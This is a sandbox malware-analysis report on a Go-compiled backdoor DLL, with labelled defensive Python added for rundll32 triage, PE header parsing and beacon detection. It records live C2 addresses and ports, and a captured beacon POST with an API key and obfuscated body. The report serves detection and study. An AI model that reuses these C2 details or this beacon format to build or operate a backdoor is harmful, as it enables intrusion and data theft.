
Windows Analysis Report
file.dll

Overview

General Information

Sample name: file.dll
Analysis ID: 1473486
MD5: e6743e380f2418b616dca113dbbc93cb
SHA1: 6c051a6d3a183c24292d6821865a5a183b4ebb9c
SHA256: eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
Tags: dll

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Found Tor onion address
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • loaddll32.exe (PID: 4128 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3500 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 1216 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6580 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6292 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6516 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1276 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)
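The process tree shows the sandbox harness (loaddll32.exe) driving rundll32.exe through every export of the DLL, which is how the export names MainFunc and _cgo_dummy_export surface. The following is an added example, not part of the Joe Sandbox report: it parses rundll32 command lines of the shape seen above into (DLL path, export) and flags the traits this sample shows, a DLL under a user-writable directory, an ordinal call, and the _cgo_ export that Go's c-shared build mode emits. The sample command lines are copied from the tree; the path list and the findings wording are this example's own rules of thumb, not a published detection.

```python
"""Parse and triage rundll32 command lines such as the ones in the process tree."""
import re

# Constructed list of path fragments an analyst treats as user-writable (example's own choice).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\|\\appdata\\|\\temp\\|\\desktop\\|\\downloads\\|\\programdata\\", re.I
)


def split_cmdline(cmdline):
    """Minimal Windows argv split: double quotes group, no backslash escaping (enough for rundll32 lines)."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_rundll32(cmdline):
    """Return (dll_path, export) for a rundll32 command line, or None if it is not one.

    rundll32 takes '<dll>,<export>' as a single argument; the export is a name or an
    ordinal written as '#N'. Quotes around the path end before the comma, as in the tree.
    """
    args = split_cmdline(cmdline)
    if len(args) < 2 or args[0].lower().rsplit("\\", 1)[-1] != "rundll32.exe":
        return None
    dll, _, export = args[1].partition(",")
    return dll, export


def triage_rundll32(cmdline):
    """List the traits worth an analyst's attention in one rundll32 invocation."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    dll, export = parsed
    findings = []
    if USER_WRITABLE.search(dll):
        findings.append("DLL loaded from a user-writable path")
    if not dll.lower().endswith(".dll"):
        findings.append("module does not carry a .dll extension")
    if export.startswith("#"):
        findings.append("export called by ordinal")
    if export.startswith("_cgo_"):
        # Go's c-shared build mode exports _cgo_dummy_export; its presence marks a Go-compiled DLL.
        findings.append("Go c-shared (cgo) export name")
    return findings


SAMPLE_TREE = [  # copied from the process tree above
    'rundll32.exe "C:\\Users\\user\\Desktop\\file.dll",#1',
    "rundll32.exe C:\\Users\\user\\Desktop\\file.dll,MainFunc",
    "rundll32.exe C:\\Users\\user\\Desktop\\file.dll,_cgo_dummy_export",
]

if __name__ == "__main__":
    for line in SAMPLE_TREE:
        print(parse_rundll32(line), triage_rundll32(line))
```

The parent cmd.exe line is deliberately not matched: the rule keys on the process that actually loads the module, so a detection built on it should run over the rundll32.exe process-creation event, not the shell that spawned it.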
No configs have been found
No yara matches
No Sigma rule has matched

Snort IDS Alerts

Timestamp                 SID      Src Port  Dst Port  Proto  Classtype                      Rule
07/15/24-12:52:56.228835  2855539  20529     49770     TCP    A Network Trojan was detected  ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2
07/15/24-12:52:56.229033  2855536  49770     20529     TCP    A Network Trojan was detected  ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1
07/15/24-12:53:25.610445  2855537  49770     20529     TCP    A Network Trojan was detected  ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2
07/15/24-12:53:25.827998  2855538  20529     49770     TCP    A Network Trojan was detected  ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1

All four alerts belong to one TCP session, 192.168.2.5:49770 <-> 185.231.155.234:20529; the rule names are the ones the Networking section lists for these SIDs.


AV Detection

Source: file.dll; ReversingLabs: Detection: 13%
Source: file.dll; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: file.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
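The two "Static PE information" lines are decoded bit fields: the first is IMAGE_FILE_HEADER.Characteristics, the second IMAGE_OPTIONAL_HEADER.DllCharacteristics. The following is an added example, not part of the report and not the sandbox's own scanner: it parses the COFF header, the optional header and the section table of a PE image, names the flags, and reproduces the "Entry point lies outside standard sections" check from the Signatures list. It runs on a header constructed in memory with the same flag values shown above for file.dll; the section names and entry point in that header are hypothetical. Flag names follow the PE/COFF specification.

```python
"""Decode the PE header fields behind the report's 'Static PE information' lines."""
import struct

FILE_CHARACTERISTICS = {  # IMAGE_FILE_HEADER.Characteristics bits
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {  # IMAGE_OPTIONAL_HEADER.DllCharacteristics bits
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# Sections an entry point is expected to live in (example's own list; anything else trips the check).
STANDARD_CODE_SECTIONS = {".text", "CODE", "INIT"}


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Parse e_lfanew, the COFF header, the optional header and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]                     # 0x10B PE32, 0x20B PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]            # AddressOfEntryPoint
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        name, vsize, vaddr = struct.unpack_from("<8sII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize))
    return {
        "machine": machine,
        "magic": magic,
        "characteristics": flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_characteristics, DLL_CHARACTERISTICS),
        "entry_rva": entry_rva,
        "sections": sections,
    }


def entry_point_section(info):
    """Name of the section whose virtual range contains AddressOfEntryPoint, or None."""
    for name, vaddr, vsize in info["sections"]:
        if vaddr <= info["entry_rva"] < vaddr + vsize:
            return name
    return None


def entry_point_outside_standard_sections(info):
    """The sandbox's 'Entry point lies outside standard sections' check as a boolean."""
    return entry_point_section(info) not in STANDARD_CODE_SECTIONS


def build_sample(entry_rva, sections):
    """Constructed PE32 header carrying file.dll's flag values (0x230E / 0x8140) over hypothetical sections."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)      # e_lfanew: PE signature right after the DOS header
    opt_size = 224                             # PE32 optional header including 16 data directories
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, opt_size, 0x230E)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<H", opt, 70, 0x8140)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, 0, 0, 0, 0, 0, 0, 0)
        for name, vaddr, vsize in sections
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


# Hypothetical layout: the entry point sits in a renamed section, as a packed or custom-linked DLL might.
SAMPLE = build_sample(0x3010, [(".text", 0x1000, 0x1000), (".data", 0x2000, 0x800), ("renamed", 0x3000, 0x200)])

if __name__ == "__main__":
    info = parse_pe(SAMPLE)
    print(info["characteristics"], info["dll_characteristics"], entry_point_section(info))
```

On a real file, read the whole image with open(path, "rb") and pass it to parse_pe; the check only uses VirtualAddress and VirtualSize, so it works on a raw file as well as on a memory dump.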

Networking

Source: Traffic; Snort IDS: 2855539 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2 185.231.155.234:20529 -> 192.168.2.5:49770
Source: Traffic; Snort IDS: 2855536 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1 192.168.2.5:49770 -> 185.231.155.234:20529
Source: Traffic; Snort IDS: 2855537 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2 192.168.2.5:49770 -> 185.231.155.234:20529
Source: Traffic; Snort IDS: 2855538 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1 185.231.155.234:20529 -> 192.168.2.5:49770
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 77.238.229.63 80
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 195.2.70.38 80
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 77.238.224.56 80
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 91.142.74.28 80
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 185.231.155.234 20529
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 77.238.250.123 80
Source: rundll32.exe, 00000004.00000002.3937101477.000000006B56B000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir 
Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000005.00000002.3937025141.000000006B56B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2137128012.000000006B56B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.3937735108.000000006B56B000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000008.00000002.2200538127.000000006B56B000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: the same string as in the 00000004 entry above (identical in all five rundll32.exe processes; the DLL image is mapped at the same address, 0x6B56B000, in each)

Note on this string: it is the concatenated string table of the Go runtime and standard library (Unicode script names such as Adlam and Kawi, runtime knobs such as GODEBUG, GOMAXPROCS and GOMEMLIMIT, net/http header and status strings) and is present in every Go binary. The .onion token next to .local comes from the net package, which skips DNS for RFC 7686 .onion names (avoidDNS in net/dnsclient_unix.go), and socks5 is a proxy scheme that net/http's Transport understands, so the "Found Tor onion address" signature is matching library strings rather than a configured hidden-service address; nothing else in this report shows Tor traffic. yamux is not part of the standard library and matches the hashicorp/yamux stream multiplexer, which fits the "Unknown Golang Backdoor" Snort rule and a long-lived session on 185.231.155.234:20529. GOMEMLIMIT (added in Go 1.19) and the Unicode 15 script name Kawi (Go 1.21 moved the unicode package to Unicode 15.0.0) indicate the sample was built with Go 1.21 or later.
Source: global traffic; TCP traffic: 192.168.2.5:49770 -> 185.231.155.234:20529
Source: Joe Sandbox View; IP Address: 91.142.74.28
Source: Joe Sandbox View; IP Address: 77.238.229.63
Source: Joe Sandbox View; IP Address: 195.2.70.38
Source: Joe Sandbox View; ASN Name: VTSL1-ASRU
Source: Joe Sandbox View; ASN Name: VDSINA-ASRU
Source: Joe Sandbox View; ASN Name: TELERU-ASRU
Source: Joe Sandbox View; ASN Name: VDSINA-ASRU
Source: Joe Sandbox View; ASN Name: TELERU-ASRU
Source: unknown; TCP traffic detected without corresponding DNS query: 195.2.70.38 (10 events)
Source: unknown; TCP traffic detected without corresponding DNS query: 91.142.74.28 (10 events)
Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.224.56 (10 events)
Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.229.63 (10 events)
Source: unknown; TCP traffic detected without corresponding DNS query: 77.238.250.123 (10 events)
Source: unknown; HTTP traffic detected:
  POST / HTTP/1.1
  Host: 195.2.70.38
  User-Agent: Go-http-client/1.1
  Content-Length: 158
  X-Api-Key: 7MBMBL3a
  Accept-Encoding: gzip
  Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
  Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
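The beacon above carries every trait a network analyst keys on: a POST to a bare IP that was never resolved through DNS, the default Go net/http User-Agent, a custom X-Api-Key header, and a 158-byte body (matching Content-Length) whose bytes all lie below 0x60. The following is an added example, not part of the report and not the sandbox's detection logic: it parses a raw HTTP/1.1 request, checks it against those traits, and includes the body-byte observation, XOR of two bytes from the printable range 0x20-0x7E always lands in 0x00-0x5F, so a body that stays below 0x60 yet contains control bytes is consistent with printable text XORed against a printable key (consistent with, not proof of; the key is not known from this report). RAW_REQUEST is rebuilt from the captured request; the set of resolved hosts passed in is constructed to model the "TCP traffic detected without corresponding DNS query" observation; the finding texts are this example's own.

```python
"""Heuristic triage of one captured HTTP request against Go-beacon traits."""
import ipaddress
import math

BODY_HEX = (  # the 158 bytes of Data Raw from the capture above
    "18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 "
    "16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 "
    "1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b "
    "41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 "
    "3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 "
    "4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 "
    "56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 "
    "5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12"
)
RAW_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 195.2.70.38\r\n"
    b"User-Agent: Go-http-client/1.1\r\n"
    b"Content-Length: 158\r\n"
    b"X-Api-Key: 7MBMBL3a\r\n"
    b"Accept-Encoding: gzip\r\n"
    b"\r\n" + bytes.fromhex(BODY_HEX)
)
# Constructed control request: an ordinary browser fetch of a name that was resolved first.
BENIGN_REQUEST = b"GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def is_ip_literal(host):
    """True when Host (port already stripped) is an IPv4/IPv6 literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant run, 8.0 for a uniform spread over all 256 values."""
    if not data:
        return 0.0
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def triage(raw, resolved_hosts):
    """Return the list of beacon indicators found in one request (example's own heuristics)."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "").split(":")[0]   # drop :port (bracketed IPv6 literals not handled)
    body = req["body"]
    findings = []
    if is_ip_literal(host):
        findings.append("Host is an IP literal")
    if host not in resolved_hosts:
        findings.append("no DNS resolution observed for Host")
    if h.get("user-agent", "").startswith("Go-http-client/"):
        findings.append("default Go net/http User-Agent")
    custom = sorted(k for k in h if k.startswith("x-") and k not in {"x-requested-with", "x-forwarded-for"})
    if custom:
        findings.append("non-standard header(s): " + ", ".join(custom))
    declared = int(h.get("content-length", "0") or "0")
    if declared != len(body):
        findings.append(f"Content-Length {declared} does not match body length {len(body)}")
    # printable XOR printable never exceeds 0x5F; control bytes rule out plain text
    if req["method"] == "POST" and body and max(body) < 0x60 and min(body) < 0x20:
        findings.append("body consistent with printable-text XOR printable-key obfuscation")
    return findings


if __name__ == "__main__":
    print(triage(RAW_REQUEST, set()), round(shannon_entropy(parse_request(RAW_REQUEST)["body"]), 2))
```

Fed with the five hard-coded port-80 hosts from this report and an empty resolved-host set, every request scores on all five indicators; the same logic over a proxy log would single out these beacons even before the Snort rule for the 185.231.155.234:20529 session fires.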
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://195.2.70.38Go-http-client/1.1PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://195.2.70.38P
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://195.2.70.38PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://195.2.70.38http://91.142.74.28G
Source: rundll32.exe, 00000005.00000002.3935276148.000000000DA06000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://195.2.70.38http://91.142.74.28http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D414000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56Go-http-client/1.1Go-http-client/1.1Go-http-client/1.1P
Source: rundll32.exe, 00000005.00000002.3932347032.000000000D808000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56Go-http-client/1.1PM
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1If-Modi
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3934227145.000000000D90C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56PM
Source: rundll32.exe, 00000005.00000002.3934857035.000000000D9AC000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56http://77.238.229.6377.238.250.123:80185.231.155.234:205291P
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D140000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.224.56http://91.142.74.28
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000004.00000002.3935140896.000000000D20C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-Encodinghttp:/
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://195.2.70.38Go-http-client/1.1http://91
Source: rundll32.exe, 00000004.00000002.3932131837.000000000D012000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3932131837.000000000D0A2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3932347032.000000000D88C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.6377.238.250.123:80PM
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.6377.238.250.123:80http://195.2.70.38http://91.142.74.28http://77.238.224.56PM
Source: rundll32.exe, 00000007.00000002.3934146478.000000000D60C000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.229.6377.238.250.123:80v
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 00000005.00000002.3932347032.000000000D8AE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4F0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D464000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D663000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 00000007.00000002.3931954299.000000000D45A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3932978999.000000000D4BE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3934146478.000000000D598000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: http://91.142.74.28
